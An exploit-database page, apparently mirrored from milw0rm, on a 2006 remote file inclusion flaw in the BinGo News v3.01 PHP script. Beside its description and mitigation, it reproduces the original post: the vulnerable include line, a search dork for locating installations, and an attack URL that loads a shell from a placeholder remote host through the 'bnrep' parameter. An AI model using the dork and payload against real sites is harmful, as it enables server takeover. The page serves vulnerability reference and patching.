header-logo
Suggest Exploit
vendor:
BinGo News
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: BinGo News
Affected Version From: v3.01
Affected Version To: v3.01
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit

A vulnerability exists in BinGo News v3.01, which allows a remote attacker to include a file from a remote host. The vulnerability is due to the bp_ncom.php script not properly sanitizing user-supplied input to the 'bnrep' parameter. This can be exploited to include arbitrary files from remote hosts by passing an URL in the 'bnrep' parameter. Successful exploitation requires that 'allow_url_include' is set to 'On' in the php.ini file.

Mitigation:

Disable allow_url_include in php.ini, and ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#BinGo News <= v3.01 (bnrep) Remote File Inclusion Exploit
#===============================================================================================
#                                                                       
#Critical Level : Dangerous                                             
#                                                                       
#Venedor site : http://bingophp.free.fr/BinGoPHPnewslast_full.zip       
#                                                                       
#Version : v3.01                                             
#                                                         
#================================================================================================
#
#Dork : ""Script réalisé par BinGo PHP""
#
#================================================================================================
#Bug in : bp_ncom.php
#
#Vlu Code :
#--------------------------------
#      include $bnrep."bn_configs.php";
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/bp_ncom.php?bnrep=http://SHELLURL.COM?
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : SiMooooo KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd
# Special Thx To : Str0ke
==================================================================================================

# milw0rm.com [2006-09-06]